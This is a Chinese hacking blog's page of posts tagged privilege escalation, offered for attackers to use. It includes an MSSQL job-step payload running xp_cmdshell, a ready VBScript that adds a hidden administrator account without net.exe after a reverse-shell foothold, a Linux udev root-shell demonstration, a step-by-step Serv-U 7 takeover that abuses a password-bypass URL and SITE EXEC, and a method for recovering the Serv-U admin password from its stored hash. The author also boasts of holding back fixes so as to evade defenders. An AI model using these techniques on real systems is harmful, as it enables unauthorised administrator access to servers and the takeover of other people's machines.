我的时光,停在了你的角落…~
Posts tagged 提权
提权0day—Windows NT #GP Trap Handler Allows Users to Switch Kernel Stack
Jan 21st
Windows 7、Windows 2008、Windows Vista、Windows 2003、Windows XP、Windows 2000、Windows NT4下均可利用,guset权限下也能成功。可应用的地方很多,很好的一个洞。不知微软补丁时会不会顺带补上其他的~
Sa-Upfile 1.0(sa权限上传文件)
Dec 12th
针对Dbowner权限下的提权脚本
Aug 11th
转自:http://hack520.co.kr/?action=show&id=50
一个针对MSSQL 2000 下的提权脚本,Dbowner提权网络上大部分都是备份到启动项后通过重启服务器达到提权的目的.但
效果并不理想.其实在MSSQL 中如果开启了 SQL Server Agent 服务的话可以通过低权限下建立帐户.
SQL代码
EXEC sp_add_job @job_name = ‘jktest’, @enabled = 1, @delete_level = 1 EXEC sp_add_jobstep @job_name = ‘jktest’, @step_name = ‘ExeC my sql’, @subsystem = ‘TSQL’, @CommAnd = ‘exeC master..xp_exeCresultSet N”seleCt ””exeC master..xp_Cmdshell “>C:\jk.txt””””,N”Master”’ EXEC sp_add_jobServer @job_name = ‘jktest’, @Server_name = ” EXEC sp_start_job @job_name = ‘jktest’
其实这个方法早就有了,不过还没有特定的Dbowner提权脚本, 我简单的写了个脚本程序,方便使用.不过这个方法我已经在
ASP.NET Web BackDoor中加入了这个功能.
下载地址: http://www.ahiec.net/ewebeditor/UploadFile/dbsql.rar
无net提权的脚本
May 27th
真正的无net加系统用户能用的脚本。。当我们遇到提权的时候,nc反弹提权的时候,管理员把net1和net给禁用了,,我们可以上传一个脚本,,做到真正的无net加系统用户。。脚本代码如下:
struser=wscript.arguments(0)
strpass=wscript.arguments(1)set lp=createObject(“WSCRIPT.NETWORK”)
oz=”WinNT://”&lp.ComputerName
Set ob=GetObject(oz)
Set oe=GetObject(oz&”/Administrators,group”)
Set od=ob.create(“user”,struser)
od.SetPassword strpass
od.SetInfo
Set of=GetObject(oz&”/” & struser & “,user”)
oe.Add(of.ADsPath)For Each admin in oe.Members
if struser=admin.Name then
Wscript.echo struser & ” 建立成功!”
wscript.quit
end if
NextWscript.echo struser & ” 用户建立失败!”
保存以上代码为 user.vbs 用法:cscript user.vbs 用户 密码
Linux爆本地提权漏洞
Apr 24th
Linux的udev程序再爆本地提权漏洞,本地用户可以轻易获得root权限,请立即更新udev程序。(2.4内核系统不受影响)
修复方法(修复前请备份重要数据):
debian用户请执行apt-get update ; apt-get upgrade -y
centos用户请执行yum update udev
RedHat用户请使用官方rpm包更新或者购买RedHat的satellite服务。
攻击效果展示:
libuuid@debian:~$ sh a 890
sh-3.1# id
uid=0(root) gid=0(root) groups=105(libuuid)
sh-3.1# cat /etc/debian_version
lenny/sid
sh-3.1# dpkg -l | grep udev
ii udev 0.114-2 /dev/ and hotplug management daemon
现在确认的是此攻击方式对Debian和Ubuntu相当有效,对RedHat的攻击效果有待确认。
Serv-U(servu)7 提权技术
Mar 26th
一,su7是提权有几种方式?
有两种形式去干掉su7。
1>,登陆管理员控制台的页面
==>获取OrganizationId,用于添加用户
==>获取全局用户的“下一个新用户ID”
==>添加用户
==>添加用户的权限 or 添加全局用户权限
==>用户登陆
==>执行系统命令添加系统账户。
2>,登陆管理员控制台页面
==>基本WEB客户端
==>来到serv-u的目录下–users–Global user目录
==>上传一个你已经定义好的用户文件
==>用户登陆
==>执行系统命令添加系统账户
而本文件使用了第一种方法。
二,提权的原理?
Su7的管理平台是http的,很先进。
抓包,分析,发现了以下路程是可以利用的。
1.管理员从管理控制台打开web页面时,是不需要验证密码的。
2.管理员如果用某URL打开web页面时,虽然需要输入密码,但是无论输入什么,都可以进入。“/?Session=39893&Language=zh,CN&LocalAdmin=1”
3.管理员可以添加用户有两种,一种是全局用户,一种是某个域下的用户。而权限设置也是两种,一种是全局,一种是针对用户。
4.管理员添加了用户的这个包和设置权限这个包,是分开的。
所以,我可以抓包然后转换成php的socket连接post出去。
最后在用经典的ftp登陆,exec命令。达到提权。
在写php的过程中,遇到很多问题,比如函数不会用等等(—_—!以前没学过php),感谢“云舒牛”帮忙。。。
在分析包的流程,发现了一些特征,服务器返回的数据,全是以xml格式发来的。而在数据传输的过程中,设计的很经典。
Su7也有自己的数据库,他也会自己生成一个id。
这个ID是随机的,在你创建用户时,会先请求服务器生成一个,生成好后,修改该id的用户名,密码等。
这很像oracle的insert手段。
写工具的过程中,遇到很多麻烦,最大的麻烦就是这个ID问题,后来分析出来了。
添加权限时,也是可以利用这个ID的。
于是工具一共连接了6次服务器,这几次分别是:
1.用来登陆平台,使用那个输入任何密码都可以登陆的页面地址。返回一个sessionid,这个sessionid在以后的包都用到了。
2.获取OrganizationId,用于添加用户
3.用来请求一个用户ID。
4.修改该ID的登陆用户名,密码。
5.修改该ID的权限,加c盘的写删执行等。
6.这次连接是做坏事的,使用前面添加的用户执行系统命令。
三,为啥我明明显示成功了,但是却提不上去?
这要看错误代码了,这里偶很惭愧,并没有写详细的错误代码判断。
一般有以下几种情况:
1,可能是因为管理员密码不对。
参照管理员密码的连接。
2,可能是因为管理员限制了执行SITE EXEC。
有待程序修改,程序可以加一个让他不限制的功能。
3,可能是程序问题。
4,为啥作者有这么多理由不去改?
你没发现么?一旦把东西做完美了,那比较系统的防御方案就出来了。
如果不完美,让他以为我们就这点手段,防御系统也会这么认为。
不信的话,过段时间,防御方案出来了,肯定有一条:“修改site exec为不可访问”。
到时候,我再写个功能,把这玩意改回来就是。
所以,等大家都提倡要XXXX的时候,我再解决XXXX的问题。大家先这么玩着吧:)
四,关于管理员密码
默认为空,如果密码为空,填什么都能进去。
如果修改过,管理员密码默认会在这里:
C:Program FilesRhinoSoft.comServ-UUsersLocal Administrator Domain.Archive
文件中找到一个MD5密码值。
C:Program FilesRhinoSoft.comServ-U
是su的根目录。
密码值的样式为(假设是123456)
kx#######################
#代表123456的32位MD5加密,而kx则是su对md5的密码算法改进的随机2位字符。
破解后的密码为kx123456,去掉kx就是密码了。
你可以针对这个加密生成字典。
最新评论